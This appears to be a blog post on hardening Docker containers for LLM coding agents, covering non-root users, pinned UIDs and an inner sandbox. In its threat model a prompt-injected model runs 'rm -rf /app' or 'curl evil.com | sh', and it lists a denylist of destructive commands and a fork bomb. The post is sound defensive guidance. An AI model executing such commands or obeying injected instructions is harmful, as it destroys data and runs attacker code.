Your agent container is running as root and you probably did not notice

Pull any popular Python base image. Run docker run -it python:3.12 whoami. The answer is root. Now picture an agent container built on that base, exposed via FastAPI, executing tool calls that include bash commands the LLM decides on. The model gets prompt-injected into running rm -rf /app. The container runs as root. The agent has full write access to its own code directory, the volume mounts, and any file the orchestrator handed it.

This is not a hypothetical. Coding agents that execute shell commands are a category specifically designed to give an LLM a writable filesystem. The single biggest reduction in blast radius for that workload is to stop running the container as root. It is one of the cheapest security wins in production AI and almost nobody does it on the first deploy.

This post is the Dockerfile I ship for every agent service, the gotchas you will hit on the way (because there are gotchas), and a clear answer to the question: what attack does this actually stop?

Why running an agent container as root is different from a CRUD app

A CRUD app running as root is bad. An agent container running as root is worse, because the agent's job is to execute things you cannot fully predict.

graph TD
    Attacker[Prompt-injected user message] --> LLM[LLM]
    LLM -->|tool_use: run_bash| Agent[Agent runtime]
    Agent -->|whoami: root| Container[Container as root]
    Container -->|writes anywhere| App["/app source code"]
    Container -->|escalates| Mounts[Mounted volumes]
    Container -->|kernel exploits| Host[Host kernel surface]

    style Container fill:#fee2e2,stroke:#b91c1c
    style App fill:#fee2e2,stroke:#b91c1c
    style Host fill:#fee2e2,stroke:#b91c1c

The threat model is concrete:

  1. The LLM is a remote-controlled command executor by design. Tool calling is not an exploit; it is the feature. A prompt injection that convinces the model to call run_bash with a hostile argument is not a bug in your code, it is a normal Tuesday.
  2. The agent's allowed tools include things like write_file, edit_file, run_bash. None of these are sandboxed unless you sandbox them.
  3. If the process running them is root, the blast radius is the entire filesystem the container can see. If the process is an unprivileged user with read-only access to most paths, the blast radius shrinks to whatever you explicitly granted.

Running as a non-root user does not stop prompt injection. It limits what a successful prompt injection can do. That is the only security property that matters in this threat model: what happens after the attacker gets in.

What does the production Dockerfile look like?

Here is the Dockerfile pattern I ship for FastAPI agent services. It uses a multi-stage build, creates an unprivileged user, and gives that user only the permissions it needs.

# filename: Dockerfile
# description: Production agent container. Multi-stage build,
# non-root user, minimal writable surface.
FROM python:3.12-slim AS builder

WORKDIR /build
COPY requirements.txt .
RUN pip install --user --no-cache-dir -r requirements.txt


FROM python:3.12-slim AS runtime

# Create an unprivileged user with a known UID/GID
RUN groupadd --system --gid 1001 agent \
 && useradd --system --uid 1001 --gid agent --home /app --shell /sbin/nologin agent

# Copy installed packages from the builder stage to the agent user's home
COPY --from=builder --chown=agent:agent /root/.local /home/agent/.local

WORKDIR /app
COPY --chown=agent:agent ./app ./app

# Drop privileges. Every command after this runs as 'agent'.
USER agent

ENV PATH="/home/agent/.local/bin:$PATH" \
    PYTHONUNBUFFERED=1 \
    PYTHONDONTWRITEBYTECODE=1

EXPOSE 8000
CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8000", "--workers", "4"]

Reading this top to bottom: the builder stage installs dependencies into ~/.local so we can copy them with their permissions intact. The runtime stage creates agent (UID 1001) with no shell and a locked home directory. We chown everything we copy in. We drop privileges with USER agent before the CMD. By the time Uvicorn starts, the entire process tree is unprivileged.

The reason USER agent is at the bottom (and not the top) is that you need root for apt-get, pip install, and chown. Switch users right before you run the application, never earlier.

For the broader production stack this Dockerfile slots into, see the FastAPI and Uvicorn for Production Agentic AI Systems post. The non-root user pattern from this post and the Uvicorn flags from that post are designed to ship together.

Why does non-root cause permission errors and how do you fix them?

The first time you switch to a non-root user, something in your container will break with PermissionError: [Errno 13]. This is not a sign you should give up. It is a sign you have discovered the implicit privileges your code was relying on.

The fix is always one of 3 things:

  1. The path your code writes to is not owned by the agent user. Add --chown=agent:agent to the COPY step that creates it.
  2. The path is a mounted volume and the host's UID does not match the container's. Either set the host directory's owner to UID 1001 (chown -R 1001:1001 ./data) or rebuild the image with a UID that matches the host.
  3. Your code writes to a hardcoded path like /tmp/agent-cache that nobody owns. Either point it at /home/agent/cache (which the agent owns) or mkdir and chown it during build.
# filename: Dockerfile (excerpt)
# description: Pre-create writable directories the agent needs at runtime
# so they exist with the right owner before USER drops privileges.
RUN mkdir -p /home/agent/cache /home/agent/logs \
 && chown -R agent:agent /home/agent/cache /home/agent/logs

USER agent

The mental model: every directory the application writes to must be owned by the agent user at image build time. Anything else is a runtime crash waiting to happen the first time a user triggers that code path. Test by running a real request locally and watching for permission errors before you deploy.

How do you sandbox an agent's bash tool on top of this?

Non-root is the floor, not the ceiling. For an agent that has a run_bash tool, you should layer 2 more controls on top.

First, run the bash tool in a separate, even more restricted container. Use docker run --rm --network none --read-only --user nobody --cap-drop ALL ... for the inner shell. The outer agent container talks to the inner one over a Unix socket or via a thin RPC. The inner container has no network, no writable filesystem (except a small /tmp volume), and no Linux capabilities. If the LLM convinces it to run curl evil.com | sh, there is no network and no writable filesystem to execute against.

Second, denylist the obvious. Before the bash command leaves your agent runtime, run it through a small allowlist or denylist of patterns. Block rm -rf /, :(){:|:&};: (the fork bomb), anything that touches /etc, anything that pipes to sh. This will not stop a determined attacker but it stops 95% of accidental damage.

The full pattern looks like this:

graph LR
    User[User message] --> Outer[Outer agent container - non-root]
    Outer -->|exec command| Sandbox[Inner sandbox - nobody, no net, read-only]
    Sandbox -->|stdout| Outer
    Outer -->|reply| User

    style Outer fill:#dcfce7,stroke:#15803d
    style Sandbox fill:#dbeafe,stroke:#1e40af

This is more work than a single Dockerfile. For a research project or an internal tool, the non-root user from this post is enough. For a public-facing coding agent, you want both layers. The Build Your Own Coding Agent course walks through the inner sandbox in detail; the free AI Agents Fundamentals primer is a good starting point if you are still designing your tool surface.

Why should you pin a uid instead of letting the system pick one?

Pin the UID to a known number (I use 1001) instead of letting useradd allocate one. There are 2 reasons.

The first is volume mounts. If your container writes to a host directory, the file owner on the host is the UID inside the container, not the username. If your image uses UID 1001 today and UID 1042 tomorrow because someone added a system package that pushed the user ID, every existing host directory becomes unwritable from the new container. Pinning the UID makes that impossible.

The second is image cache and registry diffs. A pinned UID makes the user creation layer reproducible across rebuilds. Without it, the same Dockerfile can produce different images on different machines, which makes layer diffing in a registry meaningless.

UID 1001 is a fine default. Anything in the 1000-65000 range that does not collide with system users works. Just pick one and stick with it.

What to do Monday morning

5 steps, no exotic tooling required:

  1. Open your Dockerfile. Search for the line USER. If there is no USER directive at all, your container runs as root. Add the pattern from this post.
  2. Pick a UID (1001 is fine). Create a system user with no shell and no password. Switch to it after apt-get and pip install finish.
  3. Add --chown to every COPY directive. Pre-create every directory your code writes to and chown it during build.
  4. Build the image, run it, and watch the logs for PermissionError. Fix each one by chowning the path it complains about. Stop when no errors fire on a real request.
  5. If you have a bash-executing tool, plan a separate inner sandbox for the next sprint. The non-root outer container is the floor, the inner sandbox is the ceiling.

Do not ship a coding agent to public users without these controls. Prompt injection is not optional and the cost of a successful one rises directly with the privilege of the process the LLM is steering.

Frequently asked questions

Why should a Docker container run as a non-root user?

Because every process inside a container started by a root user has root privileges from the kernel's perspective. If an attacker breaks in (via prompt injection in an agent, via a deserialization bug in a web app, or via a vulnerable dependency), they inherit those privileges. Running as an unprivileged user limits what a successful exploit can do, even though it does not prevent the exploit itself.

How do you create a non-root user in a Dockerfile?

Use groupadd --system and useradd --system to create a system user with a fixed UID, no shell, and no password. Add --chown=user:group to every COPY directive that places files the user will read or write. Switch to the user with the USER directive at the bottom of the Dockerfile, after all installation steps that need root. The application starts unprivileged.

Why does my container fail with permissionerror after switching to a non-root user?

Almost always because the path your code writes to is owned by root from earlier build steps. Fix it by adding --chown=user:group to the COPY line that created it, or by mkdir-ing and chown-ing the path explicitly before the USER directive. Mounted volumes need the host directory's owner UID to match the container user's UID, which is why pinning the UID matters.

Is non-root enough to sandbox an agent's bash tool?

No. Non-root is the floor. For an agent that executes shell commands the LLM chose, you also want to run the shell in a separate inner container with --network none, --read-only, --cap-drop ALL, and a non-privileged user inside that container too. The outer non-root agent talks to the inner sandbox over a socket. Both layers together close most of the realistic attack surface.

What uid should I use for the non-root user in my Dockerfile?

Pin a number in the 1000-65000 range that does not collide with system users on your base image. UID 1001 is a common choice and works on Debian, Ubuntu, and Alpine. Pinning the UID makes volume mount permissions stable across rebuilds and makes the image cache layer reproducible. Letting the system allocate one is the source of "it worked yesterday" bugs.

Key takeaways

  1. Coding agents are remote command executors by design. Running their container as root means a single prompt injection has root-level blast radius on the container filesystem.
  2. The fix is a 10-line Dockerfile change: create a system user with a pinned UID, --chown everything you copy, switch with USER after installs finish.
  3. Permission errors on first run are a feature, not a bug. They show you exactly which paths were silently relying on root. Fix them by chown-ing during build.
  4. Pin the UID to a known number like 1001. It keeps volume mounts and image layers reproducible across rebuilds and machines.
  5. Non-root is the floor, not the ceiling. For a public-facing coding agent, layer a second inner container with --network none --read-only --cap-drop ALL for the bash tool itself.
  6. To see the full sandbox pattern wired into a working agent, walk through the Build Your Own Coding Agent course, or start with the conceptual AI Agents Fundamentals resource.

For the OWASP-aligned reference list of container hardening steps, see the Docker security cheat sheet from OWASP. The non-root user is item one for a reason.

Share this post

Continue Reading

Weekly Bytes of AI

Technical deep-dives for engineers building production AI systems.

Architecture patterns, system design, cost optimization, and real-world case studies. No fluff, just engineering insights.

Unsubscribe anytime. We respect your inbox.

Ready to go deeper?

Go beyond articles. Build production AI systems with hands-on workshops and our intensive AI Bootcamp.